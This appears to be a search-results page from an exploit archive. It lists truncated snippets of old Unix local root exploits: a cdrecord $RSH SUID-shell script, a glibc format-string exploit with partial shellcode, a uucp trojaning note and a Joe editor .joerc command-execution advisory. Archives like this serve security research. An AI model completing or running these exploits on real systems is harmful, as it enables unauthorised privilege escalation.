26 matches found
cdrecord $RSH exec() SUID Shell Creation
No description provided by source. !/bin/bash cdrecord-suidshell.sh - Iruid CAU 09.2004 Exploits cdrecord's exec of $RSH before dropping privs cat ./cpbinbash.c include include include main int argc, char argv int fd1, fd2; int count; char buffer1; / Set ID's / setuid geteuid ; setgid geteuid ; /...
CDRecords ReadCD - $RSH exec() SUID Shell Creation
CDRecords ReadCD - $RSH exec SUID Shell Creation !/bin/bash cdrecord-suidshell.sh - Iruid CAU 09.2004 Exploits cdrecord's exec of $RSH before dropping privs cat ./cpbinbash.c include include include main int argc, char argv int fd1, fd2; int count; char buffer1; / Set ID's / setuid geteuid ; setg...
cdrecord $RSH exec() SUID Shell Creation
Exploit for linux platform in category local exploits ======================================== cdrecord $RSH exec SUID Shell Creation ======================================== !/bin/bash cdrecord-suidshell.sh - Iruid CAU 09.2004 Exploits cdrecord's exec of $RSH before dropping privs cat...
GLIBC locale - Format Strings
GLIBC locale - Format Strings / su.c by xp, modified by logikal@efnet - tested on redhat 5 - 7 / include include include include include include include include char shellcode = "\x31\xc0\x83\xc0\x17\x31\xdb\xcd\x80\xeb" "\x30\x5f\x31\xc9\x88\x4f\x17\x88\x4f\x1a"...
Re: uucp --config patch -- not sufficient
On debian the uucp and uux binaries are owned by the uucp user. Additionally /usr/lib/uucp is writeable by the uucp user. This allows us to have some fun since we don't have that nasty makewhatis, but we can still get root by trojaning uucp and uux and hoping a root owned process executes either...
Joe Text Editor 2.8 - .joerc Arbitrary Command Execution
Joe Text Editor 2.8 - .joerc Arbitrary Command Execution source: https://www.securityfocus.com/bid/2437/info Joe is a text editor originally written by Joseph Allen. Joe offers a user-friendly interface, with key binding and configuration familiar to many users of Microsoft Word Processing tools....